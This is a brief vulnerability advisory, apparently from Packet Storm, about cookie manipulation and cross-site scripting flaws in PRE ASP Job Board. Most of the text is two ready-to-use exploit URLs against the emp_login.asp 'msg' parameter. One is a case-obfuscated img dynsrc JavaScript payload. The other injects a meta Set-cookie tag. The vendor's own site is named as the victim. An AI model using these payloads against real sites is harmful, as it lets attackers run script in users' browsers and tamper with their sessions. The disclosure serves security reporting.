Pre ASP Job Board suffers from cookie manipulation and cross site scripting vulnerabilities.
4cb9b455396841958e0937624c126ccfc0832dc1f52b6241e4ca47191e137dc3#########################################################
---------------------------------------------------------
Portal Name: PRE ASP Job Board
Vendor : http://www.preproject.com
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (CM,XSS)
---------------------------------------------------------
#########################################################
[XSS]:
http://site.com/[Path]/Employee/emp_login.asp?msg=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281369%29%3B%22%3E
[CM]:
http://site.com/[Path]/Employee/emp_login.asp?msg=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&color=Red&face=verdana&size=2%3EEnter&some&value%21
---------------------------------
Victem :
http://preproject.com/preaspjobboard
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed